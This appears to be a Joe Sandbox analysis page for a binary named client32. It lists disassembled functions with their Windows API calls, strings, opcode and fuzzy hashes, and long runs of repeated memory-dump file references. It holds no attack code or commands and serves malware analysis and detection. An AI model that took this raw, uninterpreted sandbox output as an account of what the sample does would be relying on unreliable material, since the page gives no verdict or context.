Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91

Function 110267B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110267DD

Strings

?:\, xrefs: 110267D2

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791

Function 110EAED0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,62C07B5E), ref: 110EAE9D

RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,62C07B5E), ref: 110EAEEC

Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B

Strings

Error %d Opening regkey %s, xrefs: 110EAEFA

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0

Function 110EAE90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,62C07B5E), ref: 110EAE9D

Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B

Strings

Error %d closing regkey %x, xrefs: 110EAEAD

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660

Function 111429E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0241B818,?,?,?,00000100), ref: 111429F9

Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A

Strings

NSMTRACE, xrefs: 111429F4

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61

Function 68C64F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,68C68DC8), ref: 68C64F78

Strings

psapi.dll, xrefs: 68C64F71

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: 7deb212c340941b01a7c2589f676c665496ccba00603b6284f8515e3d69f0048
Instruction ID: 611c8052fb6ba82d865326b48fe50f5495355d7840fd4b157248238085928076
Opcode Fuzzy Hash: 7deb212c340941b01a7c2589f676c665496ccba00603b6284f8515e3d69f0048
Instruction Fuzzy Hash: D3E001B1901B118F83B0CF3AA54464ABAF0BB086943218A2E909EC3A00E330E5848F80

Function 110259A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8

Strings

psapi.dll, xrefs: 110259A1

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90

Function 11015160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E

Strings

nslsp.dll, xrefs: 11015163

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2

Function 11073E70 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11073ECF
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1

Function 68C65C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(973534B3,4004667F,00000000,-000397EB), ref: 68C65D1F
select.WSOCK32(00000001,?,00000000,?,00000000,973534B3,4004667F,00000000,-000397EB), ref: 68C65D62

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ioctlsocketselect
String ID:
API String ID: 1457273030-0
Opcode ID: 8ac17e66f24056190e2e7907673166c92db150aa395d6c41d28f8755bfafd1fe
Instruction ID: c8b3e5d48f27d0d13cd6707cbf17d8de443550feb71c3bbceb487a7d5b65c6a7
Opcode Fuzzy Hash: 8ac17e66f24056190e2e7907673166c92db150aa395d6c41d28f8755bfafd1fe
Instruction Fuzzy Hash: B42124759002189BEB28CF18C9587EDB7B9EF48304F4081EAE80D57281D7755F94DF90

Function 11061583 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_fgets.LIBCMT ref: 110615D5
_strpbrk.LIBCMT ref: 110615FB

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk
String ID:
API String ID: 3772100082-0
Opcode ID: 015b6b6cfba45a31106f92d5bcef8a3181b24b30841907f438b898b38d21e6b6
Instruction ID: ac3d813d9d06cefe383cdbf7085aeea3aa9dbaa4d672942e3f5a9e9bf28be114
Opcode Fuzzy Hash: 015b6b6cfba45a31106f92d5bcef8a3181b24b30841907f438b898b38d21e6b6
Instruction Fuzzy Hash: F0119175C08B59CADB21CF148C507EABFFCAF55346F1841D4D88967241EB72AA86CF50

Function 11087510 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1108752F
InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91

Function 11140AB0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140AD1
ExtractIconExA.SHELL32(?,00000000,000300EF,0009046B,00000001), ref: 11140B08

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
